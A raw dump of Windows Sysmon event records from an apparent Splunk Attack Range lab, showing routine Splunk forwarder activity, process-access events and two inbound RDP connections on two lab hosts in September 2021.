09:13:28.360{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979177Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:28.360{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8B38-6151-D279-00000000FD01}3512C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979176Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:28.360{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8B38-6151-D279-00000000FD01}3512C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979175Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:28.345{69CF5F33-8B38-6151-D279-00000000FD01}3512C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979174Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:28.110{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B91424BE3C5F69A2BD897C0CE665E5F,SHA256=ECF9BE7DFD15C4A87367A036782AA93865B8F1ED2EE6B82A725B7F2CE23411B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979173Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:28.110{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D17992CF7493A940A7DD12B2432AB3C1,SHA256=77635BE9585C4B12DDC00650153760D045280BE31A8EFAC5F8754139DDC3AAFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050507Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:28.282{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B5727D113408F004E26447776537BEBF,SHA256=3192DBA39FFB1401D99131BBED95EF9E1B444204EF4A27693D266EED5B43D02A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050511Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:26.855{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53388-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050510Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:29.362{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=245F906A9FFDFE0419A6DD42628284B4,SHA256=2E196ED680C78E759AC89717B004C49DC0AB4594FA7BF60A97DD64D4EBE127CD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979204Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.736{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59404-false10.0.1.12-8000- 23542300x8000000000000000979203Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:29.392{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21BEB592501DE78855F8B2F84F258AD7,SHA256=BD27DFB24388DF646C07641FBC93F8A4EB273C4C8D79FB5875CE1BA11F9607F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979202Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:29.267{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E10DDFB9387B93E52681269B7A92A7F,SHA256=09286D8B835657DA8B56B9B785E86473F5E83BD9552067DFABA7EA0333F1710E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979201Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:29.251{69CF5F33-8B39-6151-D379-00000000FD01}31042056C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979200Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:29.048{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8B39-6151-D379-00000000FD01}3104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979199Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:29.048{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979198Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:29.048{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979197Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:29.048{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979196Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:29.048{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979195Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:29.048{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979194Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:29.048{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979193Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:29.048{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979192Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:29.048{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979191Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:29.048{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979190Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:29.048{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8B39-6151-D379-00000000FD01}3104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979189Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:29.048{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8B39-6151-D379-00000000FD01}3104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979188Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:29.033{69CF5F33-8B39-6151-D379-00000000FD01}3104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050512Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:30.379{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFAD110FCDC0F51DE0457A125A6789D3,SHA256=A13E068750E38EDDDEAFB8A594896193B600B399E69F166E30B32DB28FBE1A4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979205Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:30.392{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=342485C9EC91A743381B1D0102DA7688,SHA256=6B002562F2C7EAE91301E84B40D80ADF4CF9AC04C2BA5F75645DFB810E1CDA90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050513Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:31.397{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B57478B5F7BC6F79FF0D347CC92B88BA,SHA256=C93AE071373B7B8072D72EAA511EE8DBE11F40D225FB8F50DE46141DA0D21A2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979206Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:31.438{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47A21BD386C07B5577CB4B8543C3AA01,SHA256=CB2914433A2F6566CA8BF6DDB0D0774BEF9B3BDF7601F644A14A83880DF3DB1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979211Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:32.579{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCF05306276371A3E18129F177DFFC25,SHA256=9CD2760623670AE8BF9909F00D0D074DDFC14F0F4D03BE269DADA84CC2BF645F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050514Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:32.412{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0C79BEEA502C47EF7A9C5F4D016F1BE,SHA256=948F660DD04EAF56DD940F1F2F97140C56BA1434FB6956FAFE063273D7BC4F00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979210Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:32.548{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=9BE500456ACB68AA9188BA2B2D10A292,SHA256=8736ECDE2D4A444F6238D6A8E291F7E4012EE18E6A75939F9ECA97CA9D40B429,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979209Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:32.267{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F1DD9FFEABCF74503801E7E98004B66F,SHA256=5ED50BD7888D9DBC5E30D16DBCE1E3FBBE2E06F1B5CA95A2ECF9A0DCB02A84D9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979208Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:29.776{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-65184-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979207Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:29.597{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-65099-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979213Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:33.595{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 